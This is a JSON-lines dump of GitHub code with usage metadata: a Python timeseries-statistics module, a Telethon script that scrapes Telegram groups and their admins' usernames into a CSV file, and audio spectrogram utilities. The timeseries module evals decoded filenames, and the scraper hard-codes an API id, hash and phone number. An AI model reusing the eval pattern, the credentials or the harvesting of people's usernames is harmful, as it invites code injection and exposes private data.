"call"}, {"api_name": "transformations.UnitVector", "line_number": 153, "usage_type": "name"}, {"api_name": "numpy.cross", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.allclose", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 166, "usage_type": "call"}, {"api_name": "transformations.UnitVector.transform", "line_number": 178, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 178, "usage_type": "name"}, {"api_name": "numpy.cross", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 223, "usage_type": "attribute"}, {"api_name": "numpy.tensordot", "line_number": 225, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 225, "usage_type": "attribute"}, {"api_name": "helper.sqrt", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 231, "usage_type": "attribute"}, {"api_name": "helper.trigivenlengths", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 266, "usage_type": "call"}, {"api_name": "helper.sqrt", "line_number": 268, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 285, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 297, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 311, "usage_type": "call"}, {"api_name": "helper.trigivenlengths", "line_number": 323, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 332, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 332, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 335, "usage_type": "call"}, {"api_name": "numpy.linalg.det", "line_number": 343, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 343, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 343, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 343, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 357, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 366, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.cosh", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 378, "usage_type": "call"}, {"api_name": "numpy.sinh", "line_number": 378, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 378, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 379, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 379, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 379, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 381, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 387, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 387, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 390, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 390, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 391, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 391, "usage_type": "call"}, {"api_name": "transformations.UnitVector.invtransform_v", "line_number": 395, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 395, "usage_type": "name"}, {"api_name": "numpy.min", "line_number": 400, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 401, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 402, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 403, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 405, "usage_type": "call"}, {"api_name": "numpy.testing.suppress_warnings", "line_number": 413, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 413, "usage_type": "attribute"}, {"api_name": "doctest.NORMALIZE_WHITESPACE", "line_number": 415, "usage_type": "attribute"}, {"api_name": "doctest.ELLIPSIS", "line_number": 415, "usage_type": "attribute"}, {"api_name": "doctest.testmod", "line_number": 417, "usage_type": "call"}]} +{"seq_id": "14334605091", "text": "#!/usr/bin/python\n# pylint: disable=line-too-long\n\"\"\"\nmodule to work with TimeseriesArrayStatistics\n\nautomatically calculates all TimeseriesStats for every Timeseries in TimeseriesArray\nat initialization\n\"\"\"\nimport sys\nimport json\nimport base64\nimport os\nimport logging\n# own modules\nfrom TimeseriesStats import TimeseriesStats as TimeseriesStats\nfrom CustomExceptions import *\n\n#################### hack begin ##########################\n\"\"\"\nhack to mimic some python 2.x behaviour is string\nrepresentation of tuples\n\"\"\"\ndef _b64encode_p3(list_obj):\n if len(list_obj) == 1:\n start =\"(u'\" + list_obj[0] + \"',)\"\n else:\n start =\"(u'\" + \"', u'\".join((str(key) for key in list_obj)) + \"')\"\n encoded = base64.urlsafe_b64encode(start.encode(\"utf-8\")).decode(\"utf-8\")\n #print(\"%s -> %s -> %s\" % (list_obj, encoded, b64decode(encoded)))\n return encoded\n\ndef _b64encode_p2(list_obj):\n encoded = base64.urlsafe_b64encode(unicode(tuple(list_obj))).decode(\"utf-8\")\n #print(\"%s -> %s -> %s\" % (list_obj, encoded, b64decode(encoded)))\n return encoded\n\ndef _b64decode(encoded):\n decoded = base64.b64decode(encoded).decode(\"utf-8\")\n #print(\"%s -> %s\" % (encoded, decoded))\n return decoded\n\n\nif sys.version_info < (3,0):\n print(\"using python 2 coding funtions\")\n b64encode = _b64encode_p3\n b64decode = _b64decode\nelse:\n b64encode = _b64encode_p3\n b64decode = _b64decode\n##################### hack end ###########################\n\n\nclass TimeseriesArrayStats(object):\n \"\"\"\n hold dictionary of TimeseriesStats objects\n \"\"\"\n\n def __init__(self, tsa):\n \"\"\"\n creates TimeseriesStat objects for every key in given TimeseriesArray object\n index_keys and value_keys are used from given TimeseriesArray object\n\n parameters:\n tsa \n \"\"\"\n # define instance data\n self.__stats = {}\n self.__index_keynames = tuple(tsa.index_keynames)\n self.__value_keynames = tuple(tsa.value_keynames)\n for index_key in tsa.keys():\n try:\n self.__stats[index_key] = TimeseriesStats(tsa[index_key])\n except TimeseriesEmptyError as exc:\n logging.info(\"Timeseries for key %s is length zero, skipping\", index_key)\n\n def __str__(self):\n return json.dumps(self.to_data(), indent=4, sort_keys=True)\n\n to_json = __str__\n\n def __eq__(self, other):\n try:\n assert self.__index_keynames == other.index_keynames\n assert self.__value_keynames == other.value_keynames\n assert len(self.__stats.keys()) == len(other.stats.keys())\n for key in self.__stats.keys():\n assert self.__stats[key] == other.stats[key]\n except AssertionError as exc:\n logging.exception(exc)\n return False\n return True\n\n def __len__(self):\n return len(self.__stats.keys())\n\n def __getitem__(self, key):\n return self.__stats[key]\n\n def __delitem__(self, key):\n del self.__stats[key]\n\n def keys(self):\n return self.__stats.keys()\n\n def values(self):\n return self.__stats.values()\n\n def items(self):\n return self.__stats.items()\n\n @property\n def stats(self):\n return self.__stats\n\n @stats.setter\n def stats(self, value):\n self.__stats = value\n\n @property\n def index_keynames(self):\n return self.__index_keynames\n\n @index_keynames.setter\n def index_keynames(self, value):\n self.__index_keynames = value\n\n @property\n def value_keynames(self):\n return self.__value_keynames\n\n @value_keynames.setter\n def value_keynames(self, value):\n self.__value_keynames = value\n\n def slice(self, value_keys):\n \"\"\"\n remove all values_keys not in value_keys, and return new TimeseriesArrayStats object\n \"\"\"\n assert all((value_key in self.__value_keynames for value_key in value_keys))\n outdata = []\n outdata.append(self.__index_keynames)\n outdata.append(value_keys)\n tsstat_data = []\n for key, tsstat in self.__stats.items():\n data = {}\n for value_key in value_keys:\n data[value_key] = tsstat[value_key]\n tsstat_data.append((key, json.dumps(data)))\n outdata.append(tsstat_data)\n new_tsastat = TimeseriesArrayStats.from_json(json.dumps(outdata))\n return new_tsastat\n\n def get_stats(self, value_key, stat_func_name=None):\n \"\"\"\n returns dictionary of stats of every Timeseries object in Array for this\n specific value_key only\n\n parameters:\n value_key must be in self.value_keys\n stat_func_name must be in self.stat_func_names or None\n\n returns:\n \n \"\"\"\n assert value_key in self.__value_keynames\n if stat_func_name is not None:\n assert stat_func_name in TimeseriesStats.get_stat_func_names()\n ret_data = {}\n for key, t_stat in self.__stats.items():\n if stat_func_name is not None:\n ret_data[key] = t_stat.stats[value_key][stat_func_name]\n else:\n ret_data[key] = t_stat.stats[value_key]\n return ret_data\n\n @staticmethod\n def _get_tsstat_dumpfilename(key):\n \"\"\"\n create filename for stored or to be stored TimeseriesStats objects\n from given key\n key will be base64 encoded\n\n parameters:\n key \n\n returns:\n \n \"\"\"\n return \"tsstat_%s.json\" % b64encode(key)\n\n @staticmethod\n def get_dumpfilename(index_keys):\n \"\"\"\n create filename for stored or to be stored TimeseriesArrayStats\n from given index_keys\n index_keys will be base64 encoded\n\n parameters:\n index_keys \n\n returns:\n \n \"\"\"\n return \"tsastat_%s.json\" % b64encode(index_keys)\n\n def dump(self, outpath, overwrite=False):\n \"\"\"\n dump internal data to json file\n the filename is automatically created from index_keys\n\n parameters:\n outpath path wehere json file will be placed\n overwrite wheter or not a existing file should be overwritten\n \"\"\"\n #logging.info(\"index_keys: %s\", self.__index_keynames)\n outfilename = os.path.join(outpath, self.get_dumpfilename(self.__index_keynames))\n outdata = {\n \"index_keys\" : self.__index_keynames,\n \"value_keys\" : self.__value_keynames,\n \"tsstat_filenames\" : []\n }\n for key, tsstats in self.__stats.items():\n filename = self._get_tsstat_dumpfilename(key)\n fullfilename = os.path.join(outpath, filename)\n if (not os.path.isfile(fullfilename)) or (overwrite is True):\n with open(fullfilename, \"wt\") as outfile:\n tsstats.dump(outfile)\n outdata[\"tsstat_filenames\"].append(filename)\n with open(outfilename, \"wt\") as outfile:\n json.dump(outdata, outfile)\n\n @staticmethod\n def _filtermatch(key_dict, filterkeys, matchtype):\n \"\"\"\n key_dict is the whole index key, aka\n {hostname : test, instance:1, other:2}\n\n filterkey is part\n {hostname : test}\n \"\"\"\n assert matchtype in (\"and\", \"or\")\n matched = 0\n for key in filterkeys.keys():\n if key_dict[key] == filterkeys[key]:\n matched += 1\n # every key must match at AND\n if (matchtype == \"and\") and (matched == len(filterkeys.keys())):\n return True\n # at least one key must match at OR\n elif (matchtype == \"or\") and (matched > 0):\n return True\n return False\n\n @staticmethod\n def _get_load_filenames(path, index_keys, filterkeys=None, matchtype=\"and\"):\n \"\"\"\n filterkeys could be a part of existing index_keys\n all matching keys will be used\n \"\"\"\n tsastat_filename = TimeseriesArrayStats.get_dumpfilename(index_keys)\n logging.debug(\"tsastat_filename: %s\", tsastat_filename)\n with open(os.path.join(path, tsastat_filename), \"rt\") as infile:\n data = json.load(infile)\n logging.debug(\"loaded json data\")\n logging.debug(\"index_keys: %s\", data[\"index_keys\"])\n logging.debug(\"value_keys: %s\", data[\"value_keys\"])\n logging.debug(\"number of ts files: %s\", len(data[\"tsstat_filenames\"]))\n filenames = {}\n for filename in data[\"tsstat_filenames\"]:\n logging.debug(\"reading key for tsstat from file %s\", filename)\n enc_key = filename.split(\".\")[0][7:] # only this pattern tsstat_(.*).json\n key = eval(b64decode(str(enc_key))) # must be str not unicode\n key_dict = dict(zip(index_keys, key))\n if filterkeys is not None:\n if TimeseriesArrayStats._filtermatch(key_dict, filterkeys, matchtype):\n logging.debug(\"adding tsastat key : %s\", key)\n filenames[key] = os.path.join(path, filename)\n else:\n # no filterkeys means every file is added\n logging.debug(\"adding tsa key : %s\", key)\n filenames[key] = os.path.join(path, filename)\n return filenames\n\n @staticmethod\n def load(path, index_keys, filterkeys=None, matchtype=\"and\"):\n \"\"\"\n load stored json file (with dump() created) and return TimeseriesArrayStats object\n\n parameters:\n path path to search for stored json file, the filename is automatically created from given index_keys\n index_keys list of index_keys\n\n returns:\n \n \"\"\"\n #logging.info(\"index_keys: %s\", index_keys)\n infilename = os.path.join(path, TimeseriesArrayStats.get_dumpfilename(index_keys))\n try:\n fh = open(infilename, \"rb\")\n indata = json.load(fh)\n except Exception as exc:\n logging.exception(exc)\n logging.error(\"something went wrong while loading %s\", infilename)\n raise exc\n #logging.info(\"loaded JSON data: %s\", indata)\n tsastats = TimeseriesArrayStats.__new__(TimeseriesArrayStats)\n tsastats.__index_keynames = tuple(indata[\"index_keys\"])\n tsastats.__value_keynames = tuple(indata[\"value_keys\"])\n tsastats.__stats = {}\n #for filename in indata[\"tsstat_filenames\"]:\n for key, filename in tsastats._get_load_filenames(path, index_keys, filterkeys, matchtype).items():\n #logging.info(\"loading TimeseriesStats object from %s\", fullfilename)\n with open(filename, \"rt\") as infile:\n tsastats.__stats[key] = TimeseriesStats.load(infile)\n return tsastats\n\n def to_data(self):\n \"\"\"\n full data will be 3 dimensional, so this method returns only structure,\n use get_stats to get 2-dimensional data of specific value_keyname\n \"\"\"\n ret_data = {\n \"index_keynames\" : self.__index_keynames,\n \"value_keynames\" : self.__value_keynames,\n \"tsstats_filenames\" : [self._get_tsstat_dumpfilename(key) for key in self.__stats.keys()],\n \"tsastats_filename\" : self.get_dumpfilename(self.__index_keynames)\n }\n return ret_data\n\n def to_json(self):\n \"\"\"\n full data will be 3 dimensional, so this method returns only structure,\n use get_stats to get 2-dimensional data of specific value_keyname\n \"\"\"\n ret_data = [\n self.__index_keynames,\n self.__value_keynames,\n [(key, timeseries.stats) for key, timeseries in self.__stats.items()]\n ]\n return json.dumps(ret_data)\n\n @staticmethod\n def from_json(jsondata):\n indata = json.loads(jsondata)\n tsastats = TimeseriesArrayStats.__new__(TimeseriesArrayStats)\n tsastats.__index_keynames = tuple(indata[0])\n tsastats.__value_keynames = tuple(indata[1])\n tsastats.__stats = {}\n for key, tsstats in indata[2]:\n # from json there are only list, but these are not hashable,\n # so convert key to tuple\n tsastats.__stats[tuple(key)] = TimeseriesStats.from_json(json.dumps(tsstats))\n return tsastats\n\n def to_csv(self, stat_func_name, sortkey=None, reverse=True):\n \"\"\"\n return csv table of data for one specific statistical function\n\n first column is always the identifying key of this TimseriesStat as string\n mainly to use in websites to get easier to the key of this row\n \"\"\"\n yield (\"#key\", ) + self.__index_keynames + self.__value_keynames\n data = None\n if sortkey is not None:\n data = sorted(self.__stats.items(), key=lambda item: item[1][sortkey][stat_func_name], reverse=True)\n else:\n data = self.__stats.items()\n for key, value in data:\n values = list(key) + [value[value_key][stat_func_name] for value_key in self.__value_keynames]\n yield (str(key), ) + tuple(values)\n", "repo_name": "gunny26/datalogger", "sub_path": "datalogger/TimeseriesArrayStats.py", "file_name": "TimeseriesArrayStats.py", "file_ext": "py", "file_size_in_byte": 13175, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base64.urlsafe_b64encode", "line_number": 28, "usage_type": "call"}, {"api_name": "base64.urlsafe_b64encode", "line_number": 33, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 38, "usage_type": "call"}, {"api_name": "sys.version_info", "line_number": 43, "usage_type": "attribute"}, {"api_name": "TimeseriesStats.TimeseriesStats", "line_number": 72, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 74, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 77, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 89, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 148, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 150, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats.get_stat_func_names", "line_number": 167, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats", "line_number": 167, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 216, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 224, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 225, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 230, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 261, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 262, "usage_type": "call"}, {"api_name": "os.path", "line_number": 262, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 263, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 264, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 265, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 266, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 267, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 270, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 276, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 277, "usage_type": "call"}, {"api_name": "os.path", "line_number": 277, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 280, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 281, "usage_type": "call"}, {"api_name": "os.path", "line_number": 281, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 297, "usage_type": "call"}, {"api_name": "os.path", "line_number": 297, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 300, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 302, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 303, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats.load", "line_number": 314, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats", "line_number": 314, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 340, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 344, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats.from_json", "line_number": 352, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats", "line_number": 352, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 352, "usage_type": "call"}]} +{"seq_id": "1117537674", "text": "from telethon.sync import TelegramClient, events\nfrom telethon.tl.types import ChannelParticipantsAdmins\nfrom telethon import functions\nfrom time import sleep\nfrom random import randint\nimport pathlib\nfrom telethon.tl.types import ChannelParticipantsAdmins\n\n# Clients data\napi_id = 1454150\napi_hash = \"6bb467eaad074e28b7bfec3ad1a75d83\"\n\n# enter phone number as a session name\nsession_name = \"37255937683.session\"\n\nsearch_keyword_file = 'lists/search_keywords.txt'\n\n# True = for only groups\n# False = for groups and channels\nsearch_only_groups = True\n\noutput_file_name = 'lists/search_results_output.csv'\n\nprint(\"[+] Script started\")\n\ntry:\n keyword_list = []\n with open(search_keyword_file) as fp:\n temp_list = fp.read().strip().split(\"\\n\")\n for i in temp_list:\n if not i.strip() == '':\n keyword_list.append(i.strip())\n print(f\"[+] Sucessfully got keywords from '{search_keyword_file}'\")\nexcept Exception as e:\n print(f\"[-] Error Occured while reading '{search_keyword_file}'\")\n print(f\"[-] Error : {e}\")\n exit()\n\ndef add_data_to_output_file(keyword, data):\n if not pathlib.Path(output_file_name).exists():\n with open(output_file_name, 'w') as fw:\n fw.write(\"Keyword,Type,Title,Username,Participants,Admins\")\n new_data = ''\n for i in data:\n new_data += f'\\n{keyword},{i}'\n with open(output_file_name, 'a') as fw:\n fw.write(new_data)\n\n# add_data_to_output_file(keyword_list)\n# exit()\n\n# logining to phone\nclient = TelegramClient(session_name, api_id, api_hash).start(phone=session_name)\nif not client.is_user_authorized():\n print(\"\\n[-] Error occured while signing in, delete session file and try again.\")\n exit()\n\nprint(\"[+] Sucessfully logged in\\n\")\nprint(f\"[+] Total keywords found in file : {len(keyword_list)}\\n\")\n\n\n\nasync def main():\n for index, keyword in enumerate(keyword_list):\n print(f\"[{index+1}] {keyword}\")\n result = await client(functions.contacts.SearchRequest(\n q=keyword,\n limit=100\n ))\n # print(result.stringify())\n data = []\n for i in result.chats:\n if i.megagroup:\n chat_type = \"group\"\n chat_admins = \"\"\n try:\n async for user in client.iter_participants(i.username, filter=ChannelParticipantsAdmins):\n if not user.bot:\n if chat_admins:\n chat_admins += f\"|{user.first_name}({user.username})\"\n else:\n chat_admins = f\"{user.first_name}({user.username})\"\n except:\n chat_admins = \"None\"\n data.append(f\"{chat_type},{i.title},{i.username},{i.participants_count},{chat_admins}\")\n else:\n chat_type = \"channel\"\n chat_admins = \"None\"\n if not search_only_groups:\n data.append(f\"{chat_type},{i.title},{i.username},{i.participants_count},{chat_admins}\")\n add_data_to_output_file(keyword, data)\n sleep(randint(1,3))\n print(\"\\n[+] All keyword done, terminating script\")\n\nclient.loop.run_until_complete(main())", "repo_name": "JacobZoarets/tgAdminCode", "sub_path": "12.search_groups_channels.py", "file_name": "12.search_groups_channels.py", "file_ext": "py", "file_size_in_byte": 3242, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pathlib.Path", "line_number": 40, "usage_type": "call"}, {"api_name": "telethon.sync.TelegramClient", "line_number": 53, "usage_type": "call"}, {"api_name": "telethon.functions.contacts.SearchRequest", "line_number": 66, "usage_type": "call"}, {"api_name": "telethon.functions.contacts", "line_number": 66, "usage_type": "attribute"}, {"api_name": "telethon.functions", "line_number": 66, "usage_type": "name"}, {"api_name": "telethon.tl.types.ChannelParticipantsAdmins", "line_number": 77, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 92, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "33911825218", "text": "import os\nimport numpy as np\nimport matplotlib\nimport nlpaug.augmenter.audio as naa\nimport matplotlib.pyplot as plt\nimport librosa.display\nimport librosa.filters\nimport multiprocessing\nimport soundfile as sf\n\ntry:\n from constants import model_params, base_data_path\n from constants import *\nexcept ModuleNotFoundError:\n from .constants import model_params, base_data_path\n from .constants import *\n\nfrom sklearn.metrics import f1_score, accuracy_score\nfrom tqdm import tqdm\nfrom joblib import Parallel, delayed\nfrom scipy import signal\nfrom scipy.io import wavfile\nfrom skopt import gp_minimize\nfrom skopt.space import Real\nfrom functools import partial\nfrom pydub import AudioSegment\n# from keras.utils import multi_gpu_model\n\n# Set a random seed for numpy for reproducibility\nnp.random.seed(42)\n\nif os.environ.get('DISPLAY', '') == '':\n print('no display found. Using non-interactive Agg backend')\n matplotlib.use('Agg')\n\ntry:\n import foundations\nexcept Exception as e:\n print(e)\n\n\ndef load_wav(path, sr):\n return librosa.core.load(path, sr=sr)[0]\n\n\ndef save_wav(wav, path, sr):\n wav *= 32767 / max(0.01, np.max(np.abs(wav)))\n # proposed by @dsmiller\n wavfile.write(path, sr, wav.astype(np.int16))\n\n\ndef save_wavenet_wav(wav, path, sr, inv_preemphasize, k):\n # wav = inv_preemphasis(wav, k, inv_preemphasize)\n wav *= 32767 / max(0.01, np.max(np.abs(wav)))\n wavfile.write(path, sr, wav.astype(np.int16))\n\n\ndef preemphasis(wav, k, preemphasize=True):\n if preemphasize:\n return signal.lfilter([1, -k], [1], wav)\n return wav\n\n\ndef inv_preemphasis(wav, k, inv_preemphasize=True):\n if inv_preemphasize:\n return signal.lfilter([1], [1, -k], wav)\n return wav\n\n\n# From https://github.com/r9y9/wavenet_vocoder/blob/master/audio.py\ndef start_and_end_indices(quantized, silence_threshold=2):\n assert quantized.size > 0\n start, end = 0, quantized.size - 1\n\n for start in range(quantized.size):\n if abs(quantized[start] - 127) > silence_threshold:\n break\n\n for end in range(quantized.size - 1, 1, -1):\n if abs(quantized[end] - 127) > silence_threshold:\n break\n\n assert abs(quantized[start] - 127) > silence_threshold\n assert abs(quantized[end] - 127) > silence_threshold\n\n return start, end\n\n\ndef trim_silence(wav, hparams):\n \"\"\"\n Trim leading and trailing silence\n Useful for M-AILABS dataset if we choose to trim\n the extra 0.5 silence at beginning and end.\n\n Thanks @begeekmyfriend and @lautjy for pointing out\n the params contradiction. These params are separate\n and tunable per dataset.\n \"\"\"\n return librosa.effects.trim(\n wav, top_db=hparams.trim_top_db,\n frame_length=hparams.trim_fft_size,\n hop_length=hparams.trim_hop_size\n )[0]\n\n\ndef get_hop_size(hparams):\n hop_size = hparams.hop_size\n if hop_size is None:\n assert hparams.frame_shift_ms is not None\n hop_size = int(\n hparams.frame_shift_ms / 1000 * hparams.sample_rate\n )\n return hop_size\n\n\ndef linearspectrogram(wav, hparams):\n D = _stft(wav, hparams)\n S = (\n _amp_to_db(np.abs(D) ** hparams.magnitude_power, hparams) -\n hparams.ref_level_db\n )\n\n if hparams.signal_normalization:\n return _normalize(S, hparams)\n return S\n\n\ndef melspectrogram(wav, hparams):\n D = _stft(wav, hparams)\n S = _amp_to_db(_linear_to_mel(\n np.abs(D) ** hparams.magnitude_power, hparams\n ), hparams) - hparams.ref_level_db\n\n if hparams.signal_normalization:\n return _normalize(S, hparams)\n\n return S\n\n\ndef inv_linear_spectrogram(linear_spectrogram, hparams):\n \"\"\"\n Converts linear spectrogram to waveform using librosa\n \"\"\"\n if hparams.signal_normalization:\n D = _denormalize(linear_spectrogram, hparams)\n else:\n D = linear_spectrogram\n\n # Convert back to linear\n S = (\n _db_to_amp(D + hparams.ref_level_db) **\n (1 / hparams.magnitude_power)\n )\n\n if hparams.use_lws:\n processor = _lws_processor(hparams)\n D = processor.run_lws(\n S.astype(np.float64).T ** hparams.power\n )\n y = processor.istft(D).astype(np.float32)\n return inv_preemphasis(\n y, hparams.preemphasis, hparams.preemphasize\n )\n else:\n return inv_preemphasis(\n _griffin_lim(S ** hparams.power, hparams),\n hparams.preemphasis, hparams.preemphasize\n )\n\n\ndef inv_mel_spectrogram(mel_spectrogram, hparams):\n \"\"\"\n Converts mel spectrogram to waveform using librosa\n \"\"\"\n if hparams.signal_normalization:\n D = _denormalize(mel_spectrogram, hparams)\n else:\n D = mel_spectrogram\n\n S = _mel_to_linear(\n _db_to_amp(D + hparams.ref_level_db) **\n (1 / hparams.magnitude_power),\n hparams\n ) # Convert back to linear\n\n if hparams.use_lws:\n processor = _lws_processor(hparams)\n D = processor.run_lws(\n S.astype(np.float64).T ** hparams.power\n )\n y = processor.istft(D).astype(np.float32)\n return inv_preemphasis(\n y, hparams.preemphasis, hparams.preemphasize\n )\n else:\n return inv_preemphasis(\n _griffin_lim(S ** hparams.power, hparams),\n hparams.preemphasis, hparams.preemphasize\n )\n\n\n# tensorflow Griffin-Lim\n# Thanks to @begeekmyfriend:\n# https://github.com/begeekmyfriend/Tacotron-2/blob/\n# mandarin-new/datasets/audio.py\n\ndef inv_linear_spectrogram_tensorflow(spectrogram, hparams):\n \"\"\"\n Builds computational graph to convert spectrogram\n to waveform using TensorFlow.\n Unlike inv_spectrogram, this does NOT invert the preemphasis.\n The caller should call\n inv_preemphasis on the output after running the graph.\n \"\"\"\n if hparams.signal_normalization:\n D = _denormalize_tensorflow(spectrogram, hparams)\n else:\n D = linear_spectrogram\n\n S = tf.pow(\n _db_to_amp_tensorflow(D + hparams.ref_level_db),\n (1 / hparams.magnitude_power)\n )\n\n return _griffin_lim_tensorflow(\n tf.pow(S, hparams.power), hparams\n )\n\n\ndef inv_mel_spectrogram_tensorflow(mel_spectrogram, hparams):\n \"\"\"\n Builds computational graph to convert mel spectrogram\n to waveform using TensorFlow.\n Unlike inv_mel_spectrogram, this does NOT invert the preemphasis.\n The caller should call\n inv_preemphasis on the output after running the graph.\n \"\"\"\n if hparams.signal_normalization:\n D = _denormalize_tensorflow(mel_spectrogram, hparams)\n else:\n D = mel_spectrogram\n\n S = tf.pow(\n _db_to_amp_tensorflow(D + hparams.ref_level_db),\n (1 / hparams.magnitude_power)\n )\n # Convert back to linear\n S = _mel_to_linear_tensorflow(S, hparams)\n return _griffin_lim_tensorflow(\n tf.pow(S, hparams.power), hparams\n )\n\n\ndef _lws_processor(hparams):\n import lws\n return lws.lws(\n hparams.n_fft, get_hop_size(hparams),\n fftsize=hparams.win_size, mode=\"speech\"\n )\n\ndef _griffin_lim(S, hparams):\n \"\"\"\n liberos implementation of Griffin-Lim\n Based on https://github.com/librosa/librosa/issues/434\n \"\"\"\n angles = np.exp(2j * np.pi * 